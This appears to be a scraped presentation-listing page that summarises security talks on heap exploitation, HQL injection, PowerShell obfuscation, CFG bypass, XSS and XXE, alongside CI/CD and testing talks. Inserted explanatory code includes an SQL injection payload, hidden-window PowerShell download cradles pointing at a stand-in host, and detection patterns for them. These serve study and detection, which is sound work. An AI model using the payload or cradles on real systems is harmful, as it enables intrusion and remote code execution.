This document provides an overview of the heaper tool, which is a heap analysis plugin for the Immunity Debugger. It was developed to help with offensive security research and analyzing heap overflows. The document discusses heaper's design, installation, usage, and capabilities such as visualizing heap layouts and validating heap chunks. It also provides examples of analyzing Windows structures and a demonstration of using heaper to examine a heap overflow.
Slides from a quick and dirty presentation I gave to colleagues on Continuous Integration, Unit / Spec testing, etc.
CREDIT: this is very much in the Zach Holman school of presentation. I borrowed a lot of inspiration (and some colors/fonts) from his designs. Attribution was given.
Marrying Jenkins and Gerrit - Berlin Expert Days 2013 (Dharmesh Sheta)
The document discusses marrying Gerrit and Jenkins to improve the code review process. Gerrit is a widely used Git server and code review tool. Jenkins is a popular open source continuous integration tool. By connecting Gerrit and Jenkins, developers can ensure code review requests meet quality standards before review by having Jenkins automatically build and test code changes and report the results in Gerrit. This allows code review to focus on design and avoids wasted time on requests that fail builds or tests. The document then demonstrates this workflow with Gerrit and Jenkins.
An introduction to the motivation and theory behind test-driven development, suitable for people with experience in Mac or iOS development using Objective-C.
The Android NDK is the tool that lets you use native code (C/C++) in your Android application. This presentation covers some interesting uses of the NDK, the advantages and disadvantages of using it, and how to get started with it in Android Studio.
This document provides an overview of an agile testing process and risk-based testing approach. It discusses using scrum boards to track testing status and priorities. Visual representations of testing progress and risks are emphasized to improve communication. Test dashboards are presented as a way to monitor testing metrics and quality.
Taking a Test Drive: iOS Dev UK guide to TDD (Graham Lee)
The document discusses test-driven development (TDD) and how it can be used to write iOS apps. Some key points:
- TDD aims to validate code behavior, discover defects early, verify fixes, and detect regressions by writing tests before code.
- Unit tests validate individual classes and components, while integration, system, and acceptance tests validate how pieces work together.
- Practicing TDD results in code that is easier to test (small focused classes/methods with few side effects) and design that is more modular.
- Fake objects and mocks can be used to test components that interact with external systems by isolating their behavior.
- Overall, TDD promotes a test
The document discusses agile testing and the role of testers in agile projects. It begins with introducing the speaker, Pascal Dufour, and his background in agile testing. Then, it asks why agile testing is important and discusses the role of testers in agile. Throughout, it emphasizes that requirements are uncertain in software development and changes are inevitable. It promotes techniques like acceptance test-driven development to reduce delays in finding mistakes and improve collaboration between teams.
Teseda provides test systems and diagnostic software to help customers debug chips and analyze failures. Their V520 and V550 test systems can test up to 348 and 512 I/O pins respectively and generate test patterns. Teseda Workbench software allows users to import test patterns, execute tests, analyze failures, and map failing scan cells to the chip design. The Diagnostic Manager NetXY software further diagnoses scan failures by analyzing the chip design and test patterns to identify the likely location of faults. Teseda's solutions help reduce time to fix design and manufacturing issues.
The document discusses the low fragmentation heap (LFH) used in Windows to improve memory allocation performance. It provides an overview of how the LFH works, including the different memory managers (front-end, back-end), data structures used, and the processes for allocating and deallocating memory. It then discusses techniques for exploiting the determinism of the LFH, such as heap feng shui to control memory layout, and overwriting fields to trigger memory corruption.
D2 T2 Steven Seeley - Ghost in the Windows 7 Allocator (mr_me)
I presented "Ghost in the Allocator" at Hack In The Box Amsterdam, 2012.
I demonstrated a new technique/variation for exploitation against the Windows 7 heap manager that abuses the allocation offset mechanism. Additionally, I also presented a likely attack technique against the consumer preview version of the Windows 8 heap manager.
As @nicowaisman mentioned in his talk Aleatory Persistent Threat, old-school heap-specific exploitation is dying. And with each Windows SP or new version, it is harder to attack the heap itself. Heap management adapts quickly and includes new mitigation techniques. But sometimes it is better to rethink the idea of mitigation and do this technique properly; even half a version of it will cover all known heap exploit techniques…
ORM2Pwn: Exploiting injections in Hibernate ORM (Mikhail Egorov)
Mikhail Egorov and Sergey Soldatov presented their research on exploiting injections in Hibernate ORM. They demonstrated that while Hibernate Query Language (HQL) is more limited than SQL, it is possible to exploit HQL injections to conduct SQL injections on popular databases like MySQL, PostgreSQL, Oracle, and Microsoft SQL Server. They did this by leveraging features of Hibernate and the databases like how Hibernate handles string escaping and allows unicode characters in identifiers. Their talk provided examples of exploiting each database and a takeaway that Hibernate is not a web application firewall and HQL injections can be used to perform SQL injections.
Windows Kernel Exploitation: This Time Font hunt you down in 4 bytes (Peter Hlavaty)
The document discusses exploiting TrueType font (TTF) vulnerabilities to achieve kernel code execution on Windows systems. It begins by describing the discovery of exploitable bugs in a TTF fuzzer. Despite mitigations like KASLR, NX, SMAP, and CFG, the researchers were able to bypass these protections through techniques like controlled overflows, abusing plain kernel structures, and function-driven attacks. They show how to leverage wild overflows, control kernel memory layout, and hijack control flow to achieve arbitrary code execution. The document emphasizes that OS design weaknesses allow bypassing modern defenses through clever bug chaining and memory manipulation.
Expanding the control over the operating system from the database (Bernardo Damele A. G.)
A database, reached either through a SQL injection or through a direct connection, can be used as a stepping stone to take control of the underlying operating system.
There is much to say about operating system control once a database server is owned: Windows registry access, anti-forensics techniques for establishing an out-of-band stealth connection, buffer overflow exploitation with memory protection bypass, and custom user-defined function injection.
These slides have been presented at SOURCE Conference in Barcelona on September 21, 2009.
This document discusses ORM injection vulnerabilities using Hibernate and MySQL as an example. It begins with an introduction to injection vulnerabilities and ORM concepts. It then demonstrates how SQL injection is possible by exploiting differences in escaping rules between HQL and MySQL. A proof of concept shows injecting HQL to retrieve all records, and injecting SQL directly by escaping quotes differently. The document concludes that input validation and parameterized queries are needed to prevent ORM injection, and frameworks may not fully prevent injection depending on the underlying database.
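The escaping mismatch that both Hibernate entries above (ORM2Pwn and this one) rely on, as an added example written for this page rather than code from either talk or from Hibernate itself: two small scanners tokenize the same concatenated query the way HQL and MySQL each read a string literal, so you can see HQL accept the input as one harmless literal while MySQL closes the literal early and runs the tail as SQL. The rules they encode are assumptions spelled out in the comments (HQL escapes a quote only as `''` and treats backslash as an ordinary character; MySQL in its default sql_mode also accepts `\'` and treats `-- ` as a line comment; Hibernate forwards the literal's characters unchanged). The `User` entity, the query template and the payload are constructed for the example.

```python
# Added example, not code from the ORM2Pwn slides or from Hibernate. It models
# the escaping rules the talk exploits. Assumptions (the page does not state
# them): HQL treats '' as its only quote escape and backslash as an ordinary
# character; MySQL (default sql_mode) treats both \' and '' as an escaped quote
# and "-- " as a comment to end of line; Hibernate copies the literal's
# characters through unchanged when it renders the SQL.

HQL_TEMPLATE = "from User u where u.name = '{}'"   # vulnerable: concatenation


def _scan_literal(text, start, backslash_escapes):
    """Scan the quoted literal opening at text[start].
    Returns (literal_value, index_after_closing_quote)."""
    i, out = start + 1, []
    while i < len(text):
        c = text[i]
        if backslash_escapes and c == "\\" and i + 1 < len(text):
            out.append(text[i + 1])           # MySQL only: \' -> '
            i += 2
        elif c == "'":
            if i + 1 < len(text) and text[i + 1] == "'":
                out.append("'")               # '' -> ' in both dialects
                i += 2
            else:
                return "".join(out), i + 1    # a lone quote closes the literal
        else:
            out.append(c)
            i += 1
    raise ValueError("unterminated string literal")


def tokenize(query, dialect):
    """Split query into ('str', value) / ('sql', text) / ('comment', text)
    tokens as the given dialect ('hql' or 'mysql') would see them."""
    mysql = dialect == "mysql"
    tokens, buf, i = [], [], 0

    def flush():
        if buf:
            tokens.append(("sql", "".join(buf)))
            buf.clear()

    while i < len(query):
        if query[i] == "'":
            flush()
            value, i = _scan_literal(query, i, backslash_escapes=mysql)
            tokens.append(("str", value))
        elif mysql and query.startswith("-- ", i):
            flush()
            tokens.append(("comment", query[i:]))   # rest of line is ignored
            break
        else:
            buf.append(query[i])
            i += 1
    flush()
    return tokens


def syntax_seen_by(query, dialect):
    """The parts a dialect's parser treats as syntax rather than string data."""
    return "".join(t for kind, t in tokenize(query, dialect) if kind == "sql")


def escaping_mismatch(user_input):
    """True when the concatenated HQL parses as the template plus a single
    literal (so Hibernate accepts it) but MySQL sees syntax outside it."""
    query = HQL_TEMPLATE.format(user_input)
    baseline = syntax_seen_by(HQL_TEMPLATE.format(""), "hql")
    try:
        hql_view = syntax_seen_by(query, "hql")
        mysql_view = syntax_seen_by(query, "mysql")
    except ValueError:
        return False                          # one side rejects the query
    return hql_view == baseline and mysql_view != baseline


def safe_query(user_input):
    """The fix: a named placeholder, with the value kept out of the query
    text (the shape of Hibernate's setParameter; assumed, not shown on page)."""
    return "from User u where u.name = :name", {"name": user_input}


# Constructed payload: HQL keeps reading one literal past x\'' because '' is
# its escape; MySQL ends the literal at \'' and runs " or 1=1 " as SQL, with
# "-- " swallowing the closing quote that the template appended.
PAYLOAD = "x\\'' or 1=1 -- "
```

`tokenize(HQL_TEMPLATE.format(PAYLOAD), "hql")` yields one `str` token, while the `mysql` view yields a `str`, an `sql` fragment containing `or 1=1`, and a `comment`; `escaping_mismatch(PAYLOAD)` is therefore true, and a plain HQL injection such as `a' or 1=1 -- ` is not flagged by it because HQL itself rejects the dangling quote. The point of the talk survives the simulation: an ORM that validates its own query language is not validating the SQL the database finally parses, so only a parameterized query (`safe_query`) removes the problem.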
The document discusses techniques for obfuscating PowerShell commands to evade detection. It begins by motivating the need for improved PowerShell logging and detection capabilities as PowerShell is increasingly used by attackers. It then outlines ways to prepare systems for PowerShell investigations through process auditing and command line logging. One section focuses on obfuscating the common technique of using New-Object Net.WebClient to perform remote downloads. It demonstrates how this command can be broken up and variables used to avoid detection based solely on the presence of certain strings.
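A constructed illustration of the detection gap that summary describes, added here and not taken from the slides: three made-up PowerShell command lines (one plain download cradle, one with the type name split into concatenated fragments and parked in a variable, one benign), a keyword rule that matches only the verbatim string, and a detector that folds the concatenation and inlines the variable before matching. The obfuscated form is one plausible variant, not a reproduction of the talk's, and the extra indicators (`New-Object` with a variable type name, a `Download*` call) are this example's own choices.

```python
import re

# Added example, not from the slides. The command lines below are constructed
# for this page; they stand in for what process-creation auditing or command
# line logging would record.
SAMPLE_COMMAND_LINES = [
    # plain cradle: the type name appears verbatim, so a keyword rule fires
    "powershell.exe -nop -w hidden -c \"(New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/a.ps1')\"",
    # obfuscated (assumed variant): type name assembled from fragments in $w
    "powershell.exe -nop -w hidden -c \"$w='Net.'+'Web'+'Cli'+'ent'; "
    "(New-Object $w).DownloadString('http://example.invalid/a.ps1')\"",
    # benign administrative use
    "powershell.exe -c \"Get-ChildItem C:\\Windows\\Temp | Remove-Item\"",
]

INDICATOR = "net.webclient"
_CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")      # 'a' + 'b'
_ASSIGN = re.compile(r"\$(\w+)\s*=\s*'([^']*)'")         # $name = 'literal'


def naive_detect(cmd):
    """String-presence rule: fires only when the type name is verbatim."""
    return INDICATOR in cmd.lower()


def normalize(cmd):
    """Fold 'a'+'b' concatenations and inline $var='literal' assignments so
    the command line reads the way the PowerShell engine will execute it."""
    prev = None
    while prev != cmd:                        # repeat until nothing folds
        prev = cmd
        cmd = _CONCAT.sub(lambda m: "'%s%s'" % (m.group(1), m.group(2)), cmd)
    for name, value in _ASSIGN.findall(cmd):
        cmd = re.sub(r"\$%s\b" % re.escape(name),
                     lambda m, v=value: "'%s'" % v, cmd)
    return cmd


def detect(cmd):
    """Return the reasons a command line is flagged (empty list = clean)."""
    reasons = []
    if naive_detect(normalize(cmd)):
        reasons.append("Net.WebClient present after normalization")
    if re.search(r"New-Object\s+\$\w+", cmd):
        reasons.append("New-Object with a variable type name")
    if re.search(r"\.Download(String|File|Data)\(", cmd, re.IGNORECASE):
        reasons.append("WebClient download method")
    return reasons


def triage(command_lines):
    """Pair each command line with (naive_hit, improved_reasons)."""
    return [(naive_detect(c), detect(c)) for c in command_lines]
```

Running `triage(SAMPLE_COMMAND_LINES)` shows the naive rule hitting only the first line, while `detect` flags the first two and leaves the benign one alone. The normalization is deliberately shallow (single-quoted literals, one level of variables); real tooling should log the de-obfuscated script block the engine actually runs rather than chase every concatenation trick on the command line.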
This document summarizes a presentation about attacking the DirectComposition component of the Windows graphics subsystem. It discusses:
1) An overview of DirectComposition and its architecture.
2) Two zero-day vulnerabilities the researchers found - a double free bug and integer overflow bug that were exploited to achieve code execution.
3) Their fuzzing approach and how they increased coverage of important DirectComposition functions.
4) Mitigation techniques Microsoft employed in later versions and ways the researchers bypassed them, such as abusing tagWND and bitmap objects.
CSW2017 Henry Li: How to find the vulnerability to bypass the control flow gua... (CanSecWest)
The document discusses techniques for bypassing Control Flow Guard (CFG) protections on Windows. It begins by introducing the author and their background in security research. It then outlines several potential attack surfaces for bypassing CFG, including using functions like VirtualAlloc and VirtualProtect that can mark memory as valid call targets, writing return addresses, and leveraging indirect calls without CFG checks. The document analyzes six CFG bypass vulnerabilities found by the author in Microsoft Edge and Chakra, and provides details on exploitation methods. It concludes by discussing improvements to harden CFG protections further.
CSW2017 Weston, Miller: csw17_mitigating_native_remote_code_execution (CanSecWest)
This document summarizes security features in Microsoft Windows 10 and Microsoft Edge that prevent control-flow hijacking and arbitrary code generation. It describes Control Flow Guard, Arbitrary Code Guard, and Code Integrity Guard, which respectively enforce control-flow integrity, prevent dynamic code generation and modification, and allow only properly signed images to be loaded. It also discusses known limitations and bypasses that Microsoft is working to address through additional features such as Control-flow Enforcement Technology (CET).
Bart Leppens gave a presentation on the Browser Exploitation Framework (BeEF). He discussed BeEF's architecture, how it hooks browsers, its module and extension system, and live demonstrations of information gathering, exploitation, and using BeEF with Metasploit. He also covered topics like inter-protocol communication, exploiting protocols like ActiveFax, and porting BeEF bind shellcode to Linux. The talk provided an overview of BeEF's capabilities and real-world attack scenarios.
The document discusses different types of heaps and heap algorithms. It describes binary min-heaps and max-heaps, including their properties and implementations using arrays. Basic heap operations like insert, delete, and build heap are explained along with their time complexities. Applications of heaps like priority queues and selection algorithms are covered. More advanced heap types like leftist heaps, skew heaps and binomial queues are also mentioned.
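An added, self-contained example (not code from the slides) of the array-backed binary min-heap that summary describes: insert and extract-min with sift-up and sift-down, the bottom-up O(n) build-heap, and the priority-queue and selection applications layered on top.

```python
# Added example, not from the slides: an array-backed binary min-heap.

class MinHeap:
    """Children of index i sit at 2i+1 and 2i+2, the parent of i at (i-1)//2,
    and the heap property is: every parent <= each of its children."""

    def __init__(self, items=()):
        self.a = list(items)
        # bottom-up build: sift down each internal node, last to first; O(n)
        for i in range(len(self.a) // 2 - 1, -1, -1):
            self._sift_down(i)

    def __len__(self):
        return len(self.a)

    def _sift_up(self, i):
        while i > 0:
            parent = (i - 1) // 2
            if self.a[parent] <= self.a[i]:
                break
            self.a[parent], self.a[i] = self.a[i], self.a[parent]
            i = parent

    def _sift_down(self, i):
        n = len(self.a)
        while True:
            left, right, smallest = 2 * i + 1, 2 * i + 2, i
            if left < n and self.a[left] < self.a[smallest]:
                smallest = left
            if right < n and self.a[right] < self.a[smallest]:
                smallest = right
            if smallest == i:
                return
            self.a[i], self.a[smallest] = self.a[smallest], self.a[i]
            i = smallest

    def insert(self, item):                 # O(log n)
        self.a.append(item)
        self._sift_up(len(self.a) - 1)

    def peek(self):                         # O(1)
        return self.a[0]

    def extract_min(self):                  # O(log n)
        if not self.a:
            raise IndexError("extract_min from empty heap")
        top = self.a[0]
        last = self.a.pop()
        if self.a:                          # move last leaf to root, repair
            self.a[0] = last
            self._sift_down(0)
        return top

    def is_valid(self):
        """Check the heap property over the whole array."""
        return all(self.a[(i - 1) // 2] <= self.a[i]
                   for i in range(1, len(self.a)))


def heapsort(items):
    """Build in O(n), then n extractions: O(n log n) overall."""
    heap = MinHeap(items)
    return [heap.extract_min() for _ in range(len(heap))]


def k_smallest(items, k):
    """Selection: build once, then k extractions, O(n + k log n)."""
    heap = MinHeap(items)
    return [heap.extract_min() for _ in range(min(k, len(heap)))]


def run_in_priority_order(tasks):
    """Priority-queue use: tasks are (priority, name) pairs, lowest first."""
    queue = MinHeap(tasks)
    return [queue.extract_min()[1] for _ in range(len(queue))]
```

The build loop starts at `len(a)//2 - 1`, the last node that has a child, because leaves already satisfy the heap property on their own; that is what makes build-heap linear rather than n insertions at O(log n) each.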
[Blackhat2015] FileCry attack against Java (Moabi.com)
This document discusses vulnerabilities in XML parsers in Oracle JDK versions prior to 7u67. It demonstrates that the parsers are vulnerable to XML external entity (XXE) attacks despite existing defenses. It shows proof-of-concept payloads that can exfiltrate file contents like /etc/passwd from a remote server using untrusted XML files. While defenses exist, the document finds that they are insufficient and fail to mitigate XXE risks in many parsers. It evaluates the defenses in various XML parsers and recommends configurations to disable external entity resolution and prevent XXE attacks.
The Hidden XSS - Attacking the Desktop & Mobile Platforms (kosborn)
The document discusses cross-site scripting (XSS) attacks that can occur outside of web browsers on desktop and mobile platforms. It provides examples of XSS vulnerabilities found in Skype, Adium, Android's Gmail app, Google Earth, and outlines a tool built to automate discovery and exfiltration of files across platforms like Mac, Android and others. The document encourages developers to properly filter HTML and secure apps from XSS attacks.
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015 (CODE BLUE)
Microsoft's web browsers, Internet Explorer and Edge, have a feature called 'XSS filter' built in which protects users from XSS attacks. In order to deny XSS attacks, XSS filter looks into the request for a string resembling an XSS attack, compares it with the page and finds the appearance of it, and rewrites parts of the string if it appears in the page. This rewriting process of the string - is this done safely? The answer is no. This time, I have found a way to exploit XSS filter not to protect a web page, but to create an XSS vulnerability on a web page that is completely sane and free of XSS vulnerability. In this talk, I will describe technical details about possibilities of XSS attacks exploiting XSS filter and propose what website administrators should do to face this XSS filter nightmare.
ModSecurity is an open source web application firewall module for Apache that includes filters to detect and block cross-site scripting (XSS) attacks. However, its XSS filters are ineffective and infrequently updated. The filters primarily rely on matching keywords and regular expressions related to JavaScript and other client-side scripting languages in the HTTP response, but do not handle different character encodings well. While ModSecurity is easy to install as an Apache module, its limitations mean attacks can still evade detection.
XSS is much more than just <script>alert(1)</script>. Thousands of unique vectors can be built and more complex payloads to evade filters and WAFs. In these slides, cool techniques to bypass them are described, from HTML to javascript. See also http://brutelogic.com.br/blog
New Methods in Automated XSS Detection & Dynamic Exploit Creation (Ken Belva)
This slide deck consists of three presentations showing both an overall and detailed view of the new patent pending methods to make Cross-Site Scripting (XSS) detection more accurate and faster as well as the creation of dynamic exploits. It was presented at OWASP AppSecUSA 2015. All Material and Methods Patent Pending Globally. All Rights Reserved.
Please visit: http://xssWarrior.com
The document summarizes a presentation on automating Drupal deployment using version control, Drush, and Features. It discusses typical development environments, deployment mistakes to avoid, and using version control, shell scripts, and continuous integration servers to automate repetitive deployment tasks and ensure changes are tested at each stage from local to development to staging and production.
This document provides a summary of little known native debugging tricks in Visual Studio. It discusses using the expression evaluator for evaluating expressions in different scopes. It also covers using Edit and Continue, setting breakpoints on specific errors, breaking on all methods of a class, naming native threads, and searching through memory. The document provides code examples and links to blog posts with more details on these techniques.
https://github.com/vorburger/opendaylight-eclipse-setup
Watch https://www.youtube.com/watch?v=TU1zjytlwFE recording of this same presentation. Same slides are also available in better quality on https://docs.google.com/presentation/d/14yLzog3OhIlVsk7Clr0Tff1YayRcFnQCUZqxHMWxiNI/.
Watch https://www.youtube.com/watch?v=BLW8aOh6WeQ screencast video to see a step by step walk through for how to use what's introduced here.
Presentation given at the OpenDaylight Open Source Software Defined Networking Mini Summit on 2016-06-21 in Berlin at the Open Platform for NFV (OPNFV) summit, by Michael Vorburger.
This document discusses continuous delivery practices for .NET projects. It covers using Git for version control, protecting branches, conducting code reviews, running static analysis and unit tests, and deploying using tools like Octopus Deploy. Challenges of using Visual Studio Team Services are also mentioned. The recommended setup combines GitHub, SonarQube, Fake, xUnit, TeamCity and Octopus.
This document introduces Selenium, an open source web application testing tool. It can run tests across multiple browsers simultaneously. Selenium tests are written in plain HTML and control the browser using JavaScript. It allows testing web applications for acceptance testing and regression testing in an automated fashion. The document provides an overview of Selenium's capabilities, components, supported browsers and platforms. It also discusses tips, extensions and common problems encountered with Selenium and compares it to Rational Functional Tester.
This document discusses DevOps concepts and the DevOps journey. It covers Agile development, continuous integration, continuous delivery, and continuous deployment. These concepts aim to have short production cycles through frequent code integration and reliable releases. However, the document notes that real-life DevOps implementation is not simple. It must address having multiple environments, secrets, security, many products/developers/systems, high availability, access control, and monitoring. While DevOps adds value and saves costs, the approach depends on company size and projects. Overall, DevOps should be considered a product in itself.
Agenda:
After covering the basics about how to find and interact with UI elements, we will look into techniques of writing maintainable tests with selendroid.
In the end we will run our tests in parallel using the Selenium Grid.
The workshop repository can be found here:
https://github.com/DominikDary/selendroid-workshop
Codeception Testing Framework -- English #phpkansaiFlorent Batard
The document discusses introducing Codeception, a PHP testing framework. It begins with an agenda that includes a presentation on Codeception, different test types, a demonstration, and best practices. It then introduces the speaker, Florent Batard, who is a security engineer and web developer from France. He explains why testing is important for reducing assumptions and validating that code runs as expected. The bulk of the document then focuses on Codeception, explaining what it is, how it works, the different types of tests it supports including acceptance, functional, and unit tests, and how to install and use it. Code examples are provided and it concludes with referencing materials and opening the floor for questions.
Continuous Delivery the French Way – Dimitri Baeli Agile Tour Beirut
Return of experience of the CTO of lefuret.com, the leading French insurance aggregator teams on how they move from 2 weeks iteration to continuous delivery
What you will learn:
Overview of the Scrum cycle, and How they overcome the challenge of continuous integration, tips & tricks.
Continuous Delivery Agile Tour Beirut 2015Dimitri Baeli
Presentation done at Agile Tour Beirut 2015 about the way LesFurets.com learnt and applies the Continous Delivery principles.
* Books and principles
* Main activities
Greens Technology is then Best Selenium Training in Chennai with Job Placements. Rated as Best Selenium Training Institute in Chennai located in Adyar, Velachery, Tambaram and OMR.
Testing with Jenkins, Selenium and Continuous DeploymentMax Klymyshyn
This document discusses using Jenkins, Selenium and continuous deployment for testing web applications. It proposes using Jenkins for continuous integration, running Selenium tests on Amazon AWS instances through a Selenium Grid. A deployment tool is suggested to deploy any version of the code within an isolated environment using tools like Fabric, Gunicorn and Nginx. The solution allows running tests periodically, executing them in parallel on different browsers and providing live URLs of branches for QA testing.
This document summarizes various native debugging tricks in Visual Studio, including using the expression evaluator, Edit and Continue limitations, StepOver configuration, customizing autoexp.dat, setting breakpoints on class methods, naming native threads, breaking on data reads, investigating object layout, and useful pseudo-registers. It provides resources for further information on these debugging techniques.
Selenium has an industry reputation of being a “flaky” tool where individual tests pass, then fail—sometimes with no production changes at all. Such flakiness in your test suites can be extremely difficult, time consuming, and frustrating to debug. The vast majority of these issues stem from using either bad locators or bad wait conditions. But both of these root causes can be addressed by implementing the right framework for your Selenium tests. Craig Schwarzwald shares the most important concepts in creating such a Selenium framework. He has proved that using a framework containing a Base Page Object that wraps core Selenium methods will produce a number of significant benefits to Selenium suites. Explore how having a single place to perform logging and error handling of core Selenium functions—as well as implementing easy uses for explicit waits—will solve nearly all Selenium flakiness issues in your test suites. Plus, you benefit from making your tests easy to create, read, and maintain over the long term.
The document discusses Selenium, an open source tool for automating web application testing. It provides an overview of Selenium and its components, including Selenium IDE for recording and playing back tests in a browser, Selenium RC for distributing tests across multiple machines, and Selenium Grid for running tests in parallel across different browsers and platforms. The document also covers setting up and writing basic tests using Selenium's Ruby client driver and frameworks like Test::Unit.
This document provides a summary of key concepts for new SharePoint developers. It discusses what functionality SharePoint provides out of the box, how the development tools and deployment process differ from a typical web application, important concepts like features and packages, and best practices around areas like disposing objects properly and avoiding direct web.config modifications. It also lists 10 things every SharePoint developer should know and how to avoid getting code rejected by an architecture group.
Security is tough and is even tougher to do, in complex environments with lots of dependencies and monolithic architecture. With emergence of Microservice architecture, security has become a bit easier however it introduces its own set of security challenges. This talk will showcase how we can leverage DevSecOps techniques to secure APIs/Microservices using free and open source software. We will also discuss how emerging technologies like Docker, Kubernetes, Clair, ansible, consul, vault, etc., can be used to scale/strengthen the security program for free.
More details here - https://www.practical-devsecops.com/
Perforce Helix Never Dies: DevOps at Bandai Namco StudiosPerforce
Traditionally at Bandai Namco Studios, there has been no unified version control system in place and teams could choose to use any VCS system for their game titles—Subversion, Git, AlienBrain, or none at all. I’ll talk about why Bandai Namco Studios chose to standardize on Perforce Helix, show how we develop LiveOps-type mobile applications using the Unity game engine, and the advantages we gain from centrally managing code and assets in Helix.
Similar to How to-catch-a-chameleon-steven seeley-ruxcon-2012 (20)
In the rapidly evolving landscape of technologies, XML continues to play a vital role in structuring, storing, and transporting data across diverse systems. The recent advancements in artificial intelligence (AI) present new methodologies for enhancing XML development workflows, introducing efficiency, automation, and intelligent capabilities. This presentation will outline the scope and perspective of utilizing AI in XML development. The potential benefits and the possible pitfalls will be highlighted, providing a balanced view of the subject.
We will explore the capabilities of AI in understanding XML markup languages and autonomously creating structured XML content. Additionally, we will examine the capacity of AI to enrich plain text with appropriate XML markup. Practical examples and methodological guidelines will be provided to elucidate how AI can be effectively prompted to interpret and generate accurate XML markup.
Further emphasis will be placed on the role of AI in developing XSLT, or schemas such as XSD and Schematron. We will address the techniques and strategies adopted to create prompts for generating code, explaining code, or refactoring the code, and the results achieved.
The discussion will extend to how AI can be used to transform XML content. In particular, the focus will be on the use of AI XPath extension functions in XSLT, Schematron, Schematron Quick Fixes, or for XML content refactoring.
The presentation aims to deliver a comprehensive overview of AI usage in XML development, providing attendees with the necessary knowledge to make informed decisions. Whether you’re at the early stages of adopting AI or considering integrating it in advanced XML development, this presentation will cover all levels of expertise.
By highlighting the potential advantages and challenges of integrating AI with XML development tools and languages, the presentation seeks to inspire thoughtful conversation around the future of XML development. We’ll not only delve into the technical aspects of AI-powered XML development but also discuss practical implications and possible future directions.
Enchancing adoption of Open Source Libraries. A case study on Albumentations.AIVladimir Iglovikov, Ph.D.
Presented by Vladimir Iglovikov:
- https://www.linkedin.com/in/iglovikov/
- https://x.com/viglovikov
- https://www.instagram.com/ternaus/
This presentation delves into the journey of Albumentations.ai, a highly successful open-source library for data augmentation.
Created out of a necessity for superior performance in Kaggle competitions, Albumentations has grown to become a widely used tool among data scientists and machine learning practitioners.
This case study covers various aspects, including:
People: The contributors and community that have supported Albumentations.
Metrics: The success indicators such as downloads, daily active users, GitHub stars, and financial contributions.
Challenges: The hurdles in monetizing open-source projects and measuring user engagement.
Development Practices: Best practices for creating, maintaining, and scaling open-source libraries, including code hygiene, CI/CD, and fast iteration.
Community Building: Strategies for making adoption easy, iterating quickly, and fostering a vibrant, engaged community.
Marketing: Both online and offline marketing tactics, focusing on real, impactful interactions and collaborations.
Mental Health: Maintaining balance and not feeling pressured by user demands.
Key insights include the importance of automation, making the adoption process seamless, and leveraging offline interactions for marketing. The presentation also emphasizes the need for continuous small improvements and building a friendly, inclusive community that contributes to the project's growth.
Vladimir Iglovikov brings his extensive experience as a Kaggle Grandmaster, ex-Staff ML Engineer at Lyft, sharing valuable lessons and practical advice for anyone looking to enhance the adoption of their open-source projects.
Explore more about Albumentations and join the community at:
GitHub: https://github.com/albumentations-team/albumentations
Website: https://albumentations.ai/
LinkedIn: https://www.linkedin.com/company/100504475
Twitter: https://x.com/albumentations
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdfPaige Cruz
Monitoring and observability aren’t traditionally found in software curriculums and many of us cobble this knowledge together from whatever vendor or ecosystem we were first introduced to and whatever is a part of your current company’s observability stack.
While the dev and ops silo continues to crumble….many organizations still relegate monitoring & observability as the purview of ops, infra and SRE teams. This is a mistake - achieving a highly observable system requires collaboration up and down the stack.
I, a former op, would like to extend an invitation to all application developers to join the observability party will share these foundational concepts to build on:
A tale of scale & speed: How the US Navy is enabling software delivery from l...sonjaschweigert1
Rapid and secure feature delivery is a goal across every application team and every branch of the DoD. The Navy’s DevSecOps platform, Party Barge, has achieved:
- Reduction in onboarding time from 5 weeks to 1 day
- Improved developer experience and productivity through actionable findings and reduction of false positives
- Maintenance of superior security standards and inherent policy enforcement with Authorization to Operate (ATO)
Development teams can ship efficiently and ensure applications are cyber ready for Navy Authorizing Officials (AOs). In this webinar, Sigma Defense and Anchore will give attendees a look behind the scenes and demo secure pipeline automation and security artifacts that speed up application ATO and time to production.
We will cover:
- How to remove silos in DevSecOps
- How to build efficient development pipeline roles and component templates
- How to deliver security artifacts that matter for ATO’s (SBOMs, vulnerability reports, and policy evidence)
- How to streamline operations with automated policy checks on container images
Generative AI Deep Dive: Advancing from Proof of Concept to ProductionAggregage
Join Maher Hanafi, VP of Engineering at Betterworks, in this new session where he'll share a practical framework to transform Gen AI prototypes into impactful products! He'll delve into the complexities of data collection and management, model selection and optimization, and ensuring security, scalability, and responsible use.
20 Comprehensive Checklist of Designing and Developing a WebsitePixlogix Infotech
Dive into the world of Website Designing and Developing with Pixlogix! Looking to create a stunning online presence? Look no further! Our comprehensive checklist covers everything you need to know to craft a website that stands out. From user-friendly design to seamless functionality, we've got you covered. Don't miss out on this invaluable resource! Check out our checklist now at Pixlogix and start your journey towards a captivating online presence today.
How to Get CNIC Information System with Paksim Ga.pptxdanishmna97
Pakdata Cf is a groundbreaking system designed to streamline and facilitate access to CNIC information. This innovative platform leverages advanced technology to provide users with efficient and secure access to their CNIC details.
Cosa hanno in comune un mattoncino Lego e la backdoor XZ?Speck&Tech
ABSTRACT: A prima vista, un mattoncino Lego e la backdoor XZ potrebbero avere in comune il fatto di essere entrambi blocchi di costruzione, o dipendenze di progetti creativi e software. La realtà è che un mattoncino Lego e il caso della backdoor XZ hanno molto di più di tutto ciò in comune.
Partecipate alla presentazione per immergervi in una storia di interoperabilità, standard e formati aperti, per poi discutere del ruolo importante che i contributori hanno in una comunità open source sostenibile.
BIO: Sostenitrice del software libero e dei formati standard e aperti. È stata un membro attivo dei progetti Fedora e openSUSE e ha co-fondato l'Associazione LibreItalia dove è stata coinvolta in diversi eventi, migrazioni e formazione relativi a LibreOffice. In precedenza ha lavorato a migrazioni e corsi di formazione su LibreOffice per diverse amministrazioni pubbliche e privati. Da gennaio 2020 lavora in SUSE come Software Release Engineer per Uyuni e SUSE Manager e quando non segue la sua passione per i computer e per Geeko coltiva la sua curiosità per l'astronomia (da cui deriva il suo nickname deneb_alpha).
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024Neo4j
Neha Bajwa, Vice President of Product Marketing, Neo4j
